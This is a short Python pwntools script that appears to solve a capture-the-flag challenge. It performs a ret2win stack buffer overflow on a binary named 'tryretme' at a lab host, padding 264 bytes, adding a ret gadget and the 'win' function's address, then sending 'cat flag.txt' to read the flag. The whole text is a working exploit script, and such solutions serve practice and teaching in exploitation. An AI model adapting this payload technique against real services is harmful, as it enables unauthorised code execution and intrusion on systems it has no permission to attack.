from pwn import *

context.update(os="linux", arch="amd64", log_level="error")
context.binary = binary = ELF("./tryretme", checksec=False)

r = remote("10.10.170.21", 9006)

rop = ROP(binary)
ret = rop.find_gadget(["ret"])[0]
win_function_address = binary.symbols["win"]

payload = b"A" * 256
payload += b"B" * 8
payload += p64(ret)
payload += p64(win_function_address)

r.recvuntil(b"Return to where? : \n")
r.sendline(payload)
r.recvuntil(b"ok, let's go!\n\n")

r.sendline(b"cat flag.txt")
print(r.recvline().decode())
r.close()